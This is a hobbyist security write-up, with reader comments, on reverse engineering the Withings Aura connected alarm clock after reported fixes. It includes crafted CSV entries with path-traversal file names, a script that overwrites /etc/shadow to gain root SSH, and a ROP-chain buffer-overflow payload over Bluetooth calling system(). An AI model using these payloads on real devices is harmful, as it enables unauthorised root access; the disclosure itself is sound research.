Contents
I received the Aura, a device advertised as a “Connected Alarm Clock”. This device in itself is quite cool and uses different sounds and color patterns to help the user fall asleep and wake him up during light stages of his sleep cycles.
The Aura
Soon I was interested in doing some reverse engineering on it because:
- It was fun
- I wanted to really own the device, I wanted to be able to run my own code on it
This article describes my journey into the Aura, from firmware image grabbing to remote buffer overflow exploitation.
They already knew some of the vulnerabilities and quickly worked on fixing the others. Since March 2017, the firmware are not vulnerable to these flaws anymore.
No firmware images, complete binary files or complete scripts will be released in this article. This article serves a purely educational purpose.
First Analysis
I first needed to know more about the hardware of the Aura. As it’s not exactly cheap, I wanted to avoid cracking the device open yet. I just had a glance at the publicly available documents from the FCC certification report available here: https://fccid.io/XNAWSD01
The (blurry) internal photos revealed the Aura was powered by a Freescale (now NXP) processor and everything you need to run an embedded Linux operating system.
Internal picture from FCC documents
This assumption was confirmed after I ran nmap against the device who is always connected to the WiFi hotspot it has been configured for.
|
1 2 3 4 5 6 7 8 9 10 11 |
$ nmap 192.168.12.196 Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-15 21:52 CET Nmap scan report for 192.168.12.196 Host is up (0.017s latency). Not shown: 999 closed ports PORT STATE SERVICE 22/tcp filtered ssh MAC Address: 00:24:E4:22:95:C2 Nmap done: 1 IP address (1 host up) scanned in 12.99 seconds |
Port 22 appeared as filtered, but a SSH server was responding. Of course, without as valid password or SSH key, this wasn’t really useful yet.
On the Bluetooth side the Aura is discoverable. A SDP server is running and let us know the following services are running.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
$ sdptool records 00:24:E4:22:95:C3 Service Name: Wireless iAP Service RecHandle: 0x10000 Service Class ID List: UUID 128: 00000000-deca-fade-deca-deafdecacaff Protocol Descriptor List: "L2CAP" (0x0100) "RFCOMM" (0x0003) Channel: 3 Profile Descriptor List: "Serial Port" (0x1101) Version: 0x0100 Service Name: Wireless iAP Service RecHandle: 0x10001 Service Class ID List: UUID 128: 00001101-0000-1000-8000-00805f9b34fb Protocol Descriptor List: "L2CAP" (0x0100) "RFCOMM" (0x0003) Channel: 9 Profile Descriptor List: "Serial Port" (0x1101) Version: 0x0100 |
Firmware Grabbing
To go further, I needed to grab the firmware of the device. As explained before, cracking it open was not an option yet.
Instead I set up a MITM configuration to sniff the communication flowing between the Aura and its servers during a firmware upgrade procedure.
It quickly appeared that what looked liked a firmware image was downloaded using HTTP.
|
1 2 3 |
GET /wsd01/wsd01_905.bin HTTP/1.1 Host: XXXXXXXXXXXXXXXXXX Accept: */* |
Firmware Image Analysis
Filesystem extraction
It was not a surprised, but the downloaded Image first appeared to be something custom, with something that looked like a header at the beginning. We will further refer to this file format as a FPKG file.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
$ file wsd01_905.bin wsd01_905.bin: data $ hexdump -C wsd01_905.bin | head -n 20 00000000 66 70 6b 67 04 57 53 44 00 01 89 03 00 00 00 50 |fpkg.WSD.......P| 00000010 4b 01 01 14 00 00 00 01 80 00 00 00 31 18 10 06 |K...........1...| 00000020 7e bf 63 bf a7 37 00 00 00 00 00 00 00 10 00 00 |~.c..7..........| 00000030 06 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 |................| 00000040 00 f0 01 00 ab 00 00 00 e8 03 00 00 00 00 80 00 |................| 00000050 00 00 00 00 05 00 00 00 02 00 00 00 01 00 00 00 |................| 00000060 01 00 00 00 08 00 00 00 00 01 00 00 04 00 00 00 |................| 00000070 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000080 00 00 00 00 00 ca 9a 3b bc 71 25 22 cd 1c 40 c0 |.......;.q%"..@.| 00000090 8f 85 c0 aa 09 01 87 44 00 00 00 00 00 00 00 00 |.......D........| 000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00001010 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff |................| 00001020 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| * 0001f010 ff ff ff ff ff ff ff ff ff ff ff ff 31 18 10 06 |............1...| 0001f020 34 54 8c 8d a8 37 00 00 00 00 00 00 00 02 00 00 |4T...7..........| 0001f030 07 00 00 00 f1 04 00 00 00 00 00 00 00 00 00 00 |................| 0001f040 00 00 00 00 02 00 00 00 03 00 00 00 aa 00 00 00 |................| 0001f050 30 e7 00 00 58 00 00 00 a7 00 00 00 aa 00 00 00 |0...X...........| |
Nevertheless, as always in this kind of situation using binwalk can quickly reveal where the interesting bits are.
|
1 2 3 4 5 6 7 8 9 10 11 |
$ binwalk wsd01_905.bin | head DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 28 0x1C UBIFS filesystem superblock node, CRC: 0xBF63BF7E, flags: 0x0, min I/O unit size: 2048, erase block size: 126976, erase block count: 171, max erase blocks: 1000, format version: 4, compression type: lzo 127004 0x1F01C UBIFS filesystem master node, CRC: 0x8D8C5434, highest inode: 1265, commit number: 0 253980 0x3E01C UBIFS filesystem master node, CRC: 0x81BCA129, highest inode: 1265, commit number: 0 1438388 0x15F2B4 Unix path: /var/log/core 1444812 0x160BCC Executable script, shebang: "/bin/sh" 1445117 0x160CFD Executable script, shebang: "/bin/sh" 1445941 0x161035 Executable script, shebang: "/bin/sh" |
The downloaded blob was containing a UBIFS image at offset 0x1C (probably just after what was looking like a header).
Extracting the files from the UBIFS image was rather easy thanks to the scripts from https://github.com/jrspruitt/ubi_reader
|
1 2 3 4 5 6 |
$ ubireader_extract_files -k 1C.ubi Extracting files to: ubifs-root $ ls ubifs-root bin lib mnt services uImage dev libexec proc sys usr etc linuxrc sbin tmp var |
All the files from the from the embedded Linux were now accessible! The first thing I did was of course to check the content of the /etc/shadow file. I launched a the john password cracker against it, but gave up after a couple of minutes. The password was probably to complicated for this. Entering the device thanks to a simple brute force attack would have disappointing anyway.
The FPKG file format
Now that all the files were available, it was possible to understand the FPKG structure.
The functions linked to firmware updates and the FPKG files were available in the two shared libraries libfpkg.so and libufw.so. After some disassembly and guesswork, I came up with the following structure.
A ksy file describing this structure (http://kaitai.io/) is available here.
Applying this structure to the file I obtained before gave me:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
[-] [root] [-] header [.] magic = 66 70 6b 67 [.] product_name_size = 4 [.] product_name = "WSD" [.] firmware_type = 1 [.] firmware_version = 905 [.] firmware_size = 21712896 [.] checksum_type = 1 [.] checksum_size = 20 [.] signature_type = 1 [.] signature_size = 128 [.] firmware_data = 31 18 10 06 7e bf 63 bf a7 37 00 00 00 00 00 00 00 10 00 ... [.] checksum = 15 ec a1 c5 55 aa 54 dd f2 54 14 7c ef 1d a3 2a f6 aa ab 8b [.] signature = 3e db da 40 aa 9f 5b 49 3d a2 00 0f 37 65 22 29 00 cb 4e 73 ... |
The file was signed, so it was not possible to update my own firmware yet.
Getting a Root SSH Access
After having obtained the firmware, the next step was to obtain an SSH access. I started looking at the binaries running on the board and tried to find some vulnerabilities.
Directory Traversal Attack On Seqmand
One of the daemon called seqmand caught my attention. seqmand is responsible for automatically downloading audio files from remote servers. It is working in the following way:
- At boot, seqmand downloads a csv file.
123GET /content/aura/sequences-v3/aura_seq_list.csv HTTP/1.1Host: XXXXXXXXXXXXXXXXXXXAccept: */* - A typical aura_seq_list.csv looks like the following listing.
1234#name;is_mandatory;filename;md5;filesize;WAKEUP_4;1;v3_audio_main_part_2.mp3;e7920da0ecb5e97a214ca9935f7e821f;720WAKEUP_4;1;v3_audio_main_part_1.mp3;77c1b5fd054233f1d6e0dd12d0d419c5;5272WAKEUP_3;1;v3_audio_main_part_2.mp3;e4d0620ab9fa56cb1ef29485c4377a01;1160 - For each row of the csv, seqmand will download the corresponding file to a temporary folder. For instance, by using the previous csv file, seqmand will do the following.
123download "http://XXXXXXX/content/aura/sequences-v3/WAKEUP_4/v3_audio_main_part_2.mp3" to "/tmp/sequences/WAKEUP_4/v3_audio_main_part_2.mp3"download "http://XXXXXXX/content/aura/sequences-v3/WAKEUP_4/v3_audio_main_part_1.mp3" to "/tmp/sequences/WAKEUP_4/v3_audio_main_part_1.mp3"download "http://XXXXXXX/content/aura/sequences-v3/WAKEUP_3/v3_audio_main_part_2.mp3" to "/tmp/sequences/WAKEUP_3/v3_audio_main_part_2.mp3" - The temporary files are finally moved to the /usr/share/sequences folder.
I redirected the HTTP requests of seqmand to my own rogue HTTP server and served custom aura_seq_list.csv files. I quickly noticed a directory traversal attack was possible.
For instance, if I used the following csv and served a test file with a valid MD5:
|
1 2 |
#name;is_mandatory;filename;md5;filesize; WAKEUP_42;1;../../../test;cbb788cf62b23c4bf6e91042576d75a3;720 |
seqmand was doing the following:
|
1 |
download "http://XXXXXXX/content/test" to "/tmp/sequences/WAKEUP_42/../../../test" |
I emulated the daemon on my laptop using a statically compiled qemu. The /test file was created.
I won’t spend too much time explaining how to compile and use qemu. Others articles already did that. See for instance this.
My first plan was of course to overwrite the /etc/shadow file with my own password.
|
1 2 |
#name;is_mandatory;filename;md5;filesize; WAKEUP_42;1;../../../etc/shadow;326c68d758d21b2a4bb1f5e14931c2b4;720 |
Just like before, this was working just fine when I emulated the attack on my laptop using qemu. Nevertheless, the attack was failing on the Aura. Thanks to another trick, I was able to understand why.
Log Files Grabbing
While browsing through the files available on the filesystem, I bumped into the /usr/bin/usb_hd_hotplug script. It’s automatically launched as soon as a USB drive is plugged in one the Aura’s ports.
This script does the following:
- mount the USB drive
- check for a signed script, and run it if it’s valid
- run a flash_from_usb function
- run a copy_logs function
The signed script cannot be used. The flash_from_usb requires a signed FPKG image. Nevertheless, the copy_logs function just searches for a file called withings-options containing the line copy_logs=1. If this file is present on the USB drive, the script will copy log files on it.
|
1 2 3 4 5 6 7 8 9 10 |
copy_logs() { cat $MOUNT_POINT/withings-options 2> /dev/null|grep "copy_logs=1" -q || return 1 logger -t automount "Copying logs" color 4000 1 4000 #purple cp /var/log/messages* $MOUNT_POINT sync sleep 1 color 1 1 1 } |
A Working Directory Traversal Exploit
Thanks to the logs, I realized most of the operating system was running on read-only partitions (which was not that big of a surprise). Nevertheless, some parts were still writable.
The following piece of code comes from the /etc/init.d/prepare_services script.
|
1 2 3 4 5 6 7 8 |
mkdir -p /var/service #copy services scripts so the directories can be writable cp -r /etc/init.d/services/* /var/service # Allow core dumps (5M max) ulimit -c 10000 runsvdir /var/service & |
It means a collection of runsv processes folders (see http://smarden.org/runit/runsv.8.html and http://smarden.org/runit/runsvdir.8.html for reference) are launched from the writable /var/service directory.
For instance, at runtime the content of /var/service/sshd/ is the following.
|
1 2 3 4 5 6 7 8 9 10 |
sshd ├── down ├── run └── supervise ├── control ├── lock ├── ok ├── pid ├── stat └── status |
The file run is the startup script that will be executed when the service is launched while everything in the supervise/ folder can be used to interact with the process.
I decided to overwrite the /var/service/sshd/run script. Unfortunately, this was not enough. This script was only launched once at boot time and long before I can overwrite it. I needed a way to force a restart of the ssh daemon.
That’s why I also used the /var/service/sshd/supervise/control named pipe. According to the man page of runsv, it is possible to kill or relauch the service by writing into it. For instance, doing
|
1 2 |
$ echo k > /var/service/sshd/supervise/control $ echo u > /var/service/sshd/supervise/control |
will kill and relaunch the sshd service and execute the run script again.
I then used the following csv file.
|
1 2 3 4 |
#name;is_mandatory;filename;md5;filesize; WAKEUP_5;1;../../../var/service/sshd/run;672a1e6b4a9b2ce8ebef3755217faf8b;720 WAKEUP_6;1;../../../var/service/sshd/supervise/control;8ce4b16b22b58894aa86c421e8759df3;720 WAKEUP_7;1;../../../var/service/sshd/supervise/control;7b774effe4a349c6dd82ad4f4f21d34c;720 |
My server was serving the following run file:
|
1 2 3 4 5 6 |
#!/bin/sh mount -oremount,rw / echo "Your shadow comes here" > /etc/shadow exec dropbear -F &> /dev/null |
And replied with a k at the first hit of the control file, and with a u at the second hit.
The attack was a success, I had a root SSH access. The (quite dirty) scripts I used are available here.
Installing gdbserver
Having a SSH access allowed me to get a better understanding of how the Aura’s internals were working. Further, a lot of cool binaries and scripts let me play with the peripherals of the Aura. I was able to play with the 7-segments display, to turn lights on and off, …
To go even further, I decided to cross compile a gdbserver. I went the lazy way and built it thanks to Buildroot. The Buildroot configuration I used is available here.
For those unfamiliar with Buildroot, all you need to do is to copy my defconfig file into the configs/ folder of a freshly cloned buildroot repo, and run the following commands:
|
1 2 |
$ make aura_gdbserver_defconfig $ make |
The gdbserver binary will be available in output/target/usr/bin/.
For whatever reason, the resulting gdbserver was not working perfectly. It was sometimes crashing. But it was enough to put a breakpoint and explore the memory.
Bluetooth RCE
Thanks to the SSH access and the gdbserver, I have been able to discover and exploit a buffer overflow vulnerability in the Bluetooth protocol of the Aura.
Bluetooth Communications Reverse Engineering
To understand the way smartphone App communicates with the Aura, I started by using the “Bluetooth HCI snoop log” developper feature of my Android phone. It let me sniff all the Bluetooth communication between my phone and the device.
The App is using RFCOMM on channel 9 to communicate with the device. This service is one of the two advertised by the SDP server (see the “First analysis” section).
As a first step, I tried replaying some of the packets I saw when I was playing with the clock display brightness. I sent the following payloads:
|
1 2 3 |
01 01 00 0b 01 09 0f 00 06 09 0d 00 02 01 0c 01 01 00 0b 01 09 0f 00 06 09 0d 00 02 01 42 01 01 00 0b 01 09 0f 00 06 09 0d 00 02 01 00 |
By using this small python script:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
#!/usr/bin/env python3 import socket import time import sys if __name__ == "__main__": payloads = [b"\x01\x01\x00\x0b\x01\x09\x0f\x00\x06\x09\x0d\x00\x02\x01\x0c", b"\x01\x01\x00\x0b\x01\x09\x0f\x00\x06\x09\x0d\x00\x02\x01\x42", b"\x01\x01\x00\x0b\x01\x09\x0f\x00\x06\x09\x0d\x00\x02\x01\x00"] if len(sys.argv) != 2: print("Usage: {} <mac>".format(sys.argv[0])) exit(-1) mac = sys.argv[1] s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM) print("Connecting to Aura ({})".format(mac)) try: s.connect((mac, 9)) except: print("Error while connecting to {}".format(mac)) exit(-1) for i in range(2): for payload in payloads: s.send(payload) time.sleep(1) s.close() print("Done") |
It worked as expected.
I next tried to understand the structure of the packets I sent. Helped by the disassembly of a shared library called libpairing.so and nm, the binary responsible of Bluetooth and WiFi communications, I was able to figure out the following.
A ksy file describing this structure (http://kaitai.io/) is available here.
Applying this structure against one of the brightness control payload we used before gives:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
[-] [root] [-] header [.] unknown = 01 01 [.] packet_size = 11 [.] protocol_version = 1 [.] command_id = 2319 [.] arguments_size = 6 [-] arguments [-] argument (1 = 0x1 entries) [-] 0 [-] argument_header [.] argument_id = 2317 [.] argument_size = 2 [.] argument_data = 01 0c |
I didn’t try to understand what was the first byte of the argument_data, but the second was obviously a value representing the brightness.
An harcoded array in the nm binary makes a link between the command IDs and the corresponding functions. Some of these commands were probably not aimed at being used by the smartphone App. The command 0x205, called cmd_perso was especially interesting.
The cmd_perso Command
The command cmd_perso can be used to read and write configuration data from the board. This data can for instance be:
- The unique manufacturing id of the device
- The hostname of a some server
- A “secret” (I’m not sure of what this secret is actually doing and I didn’t really try to unsderstand. I guess it may be used during an authentification process or something like that)
The command can also be used to read and write Uboot environment variables. It can finally be used to reset user settings. No need to say this is a quite dangerous command. Furthermore, the parsing of this command suffers from a buffer overflow vulnerability.
To understand where the vulnerability is, let’s first have a look at the argument of the cmd_perso. It has the following structure.
The action_id allows to select an action: write or read a variable, or reset the user settings. The fields are used to put the names and values of those variables.
A ksy file describing this structure (http://kaitai.io/) is available here.
Let’s now have a look at the beginning of the function called when a cmd_perso is received.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
/ (fcn) fcn.0x3ce4c 200 | fcn.0x3ce4c (int arg_110h, int arg_114h, int arg_118h); | ; var int local_118h @ fp-0x118 | ; var int local_114h @ fp-0x114 | ; var int local_110h @ fp-0x110 | ; arg int arg_110h @ fp+0x110 | ; arg int arg_114h @ fp+0x114 | ; arg int arg_118h @ fp+0x118 | ; var int local_4h @ r13+0x4 | 0x0003ce4c 00482de9 push {fp, lr} | 0x0003ce50 04b08de2 add fp, sp, 4 | 0x0003ce54 12de4de2 sub sp, sp, 0x120 | 0x0003ce58 10010be5 str r0, [fp - local_110h] | 0x0003ce5c 14110be5 str r1, [fp - local_114h] | 0x0003ce60 18210be5 str r2, [fp - local_118h] | 0x0003ce64 433f4be2 sub r3, fp, 0x10c | 0x0003ce68 0300a0e1 mov r0, r3 | 0x0003ce6c b945ffeb bl sym.imp.wpp_init_perso | 0x0003ce70 18311be5 ldr r3, [fp - local_118h] | 0x0003ce74 0338a0e1 lsl r3, r3, 0x10 | 0x0003ce78 2328a0e1 lsr r2, r3, 0x10 | 0x0003ce7c 431f4be2 sub r1, fp, 0x10c | 0x0003ce80 8c309fe5 ldr r3, [0x0003cf14] ; [0x3cf14:4]=0xdd30 sym.imp.wpp_unpack_perso | 0x0003ce84 00308de5 str r3, [sp] | 0x0003ce88 0100a0e1 mov r0, r1 | 0x0003ce8c 14111be5 ldr r1, [fp - local_114h] | 0x0003ce90 80309fe5 ldr r3, [0x0003cf18] ; [0x3cf18:4]=0x205 | 0x0003ce94 9841ffeb bl sym.imp.wpp_unpack_arg | 0x0003ce98 0030a0e1 mov r3, r0 | 0x0003ce9c 000053e3 cmp r3, 0 ... |
The problem lies in the parsing of the argument of the RFCOMM packet (see the previous section for to understand the entire packet structure). The parsing is done by the function wpp_unpack_arg called at line 28.
The wpp_unpack_arg is supposed to fill a 262 bytes structure initialized by the wpp_init_perso function (line 18). It’s a very generic function who takes as argument a pointer to a more specific function able to parse the payload of a cmd_perso packet: wpp_unpack_perso (line 23).
The wpp_unpack_perso calls the memcpy function multiple times and fills the 262 bytes long structure without boundaries checking. The fields of the cmd_perso packet argument are copied into it. A buffer overflow can occur, it is possible to overwrite the saved fp and lr registers saved on the stack.
Buffer Overflow Exploitation
To exploit this buffer overflow, I choose to use well known ROP techniques. I encountered two main difficulties:
- I didn’t find that many ROP gadgets on the code
- The size of each field is limited to a length of 0xff
Because of these two points, it was not possible to build a long and complex ROP chain. That’s the reason why I decided to build the exploit in the following way:
- Build a chain able to write a couple of bytes of data (to keep things small) to a known writable address. Obviously, the execution has to start normally after the execution of this payload.
- Build another chain to call the system() function with this writable address as argument.
To build the first chain, I used the following gadget:
- The “Set R3” gadget (starts at 0x0000e840):
12345678910.-> 0x0000e798 24109fe5 ldr r1, [0x0000e7c4] ; [0xe7c4:4]=0x5cc0c loc.__bss_start__| 0x0000e79c 24009fe5 ldr r0, [0x0000e7c8] ; [0xe7c8:4]=0x5cc0c loc.__bss_start__| 0x0000e7a0 011060e0 rsb r1, r0, r1| 0x0000e7a4 4111a0e1 asr r1, r1, 2| 0x0000e7a8 a11f81e0 add r1, r1, r1, lsr 31| 0x0000e7ac c110b0e1 asrs r1, r1, 1| 0x0000e7b0 1eff2f01 bxeq lr| ....................................................| 0x0000e840 0840bde8 pop {r3, lr}`=< 0x0000e844 d3ffffea b 0xe798 - The “Set R4” gadget:
10x0000e804 1080bde8 pop {r4, pc} - And finally, the “Write memory byte” gadget:
120x0000e800 0030c4e5 strb r3, [r4]0x0000e804 1080bde8 pop {r4, pc}
To let the execution of the program resume normally, I added a
|
1 |
0x0003cf10 0088bde8 pop {fp, pc} |
at the very end of the chain end to pop a valid fp and pc from the stack.
Considering the limited length of buffer and the necessity of stopping the chain just before a valid fp and pc, I successfully built a chain able to write three bytes at a time. Using this payload multiple times was enough to write an arbitrary shell command to a known address.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
payload = b"A"*(0x47-4) # Padding payload += b"\x42" * 4 # Don't care payload += b"\x40\xe8\x00\x00" # Set R3 gadget payload += pack("<I", values[0]) # R3 value payload += b"\x04\xe8\x00\x00" # Set R4 gadget payload += pack("<I", address) # R4 value payload += b"\x00\xe8\x00\x00" # Write mem gadget payload += pack("<I", address+1) # R4 value payload += b"\x40\xe8\x00\x00" # Set R3 gadget payload += pack("<I", values[1]) # R3 value payload += b"\x00\xe8\x00\x00" # Write mem gadget payload += pack("<I", address+2) # R4 value payload += b"\x40\xe8\x00\x00" # Set R3 gadget payload += pack("<I", values[2]) # R3 value payload += b"\x00\xe8\x00\x00" # Write mem gadget payload += b"\x42" * 4 # Don't care payload += b"\x10\xcf\x03\x00" # Resume normal execution |
The chain aimed at calling system() was easier to build. I just used the following gadget and took care of calculating the right value for fp.
|
1 2 3 |
0x000403d4 853f4be2 sub r3, fp, 0x214 0x000403d8 0300a0e1 mov r0, r3 0x000403dc 7d36ffeb bl sym.imp.system ; int system(const char *string); |
|
1 2 3 4 5 |
fp = cmd_address + 0x214 payload = b"A"*(0x47-4) # padding payload += pack("<I", fp) # fp value payload += b"\xd4\x03\x04\x00" # system call gadget |
The following demo shows the result once everything is put together
Conclusion
From the firmware obtained thanks to the cleartext HTTP traffic, it has been possible to root the Aura and detect two vulnerabilities.
The first of them was possible to exploit thanks to MITM. I exploited it to get a SSH root access and run my own code.
The other was more serious. An attacker could possibly exploit it to run his own code on the device using a Bluetooth RFCOMM link.
As explained before, all these flaws are currently fixed.
Very nice first post, Looking forward to more 😀
Amazing work! Thanks for sharing.
You made it sounds so simple.
Great article.
Simply astonishing! Excellent article.
Wow, Ok you have not reported to Aura, did you? How was it fixed, did they pay you any reward?
Hi,
As explained in the article, I did contact the manufacturer. All my findings were fixed with an automatically deployed firmware update. No more plain-text HTTP, buffer overflow, …
I’m doing this as a simple hobby and not for a living. I don’t really care about receiving a reward or not. This topic hasn’t even been discussed with the manufacturer.
Hi, really nice !!
A little tips, next time use this tool to easily setup a qemu vm (mips, arm, ppc, x86… and more)
http://github.com/nongiach/arm_now
Impressive bit of investigation. Just curious, are you still looking to find another way in? After all, you were trying to put your own software on there.
Hi, thanks for the comment. I’ve checked a little but I haven’t found other ways to get in, everything I’ve discovered is already in the article.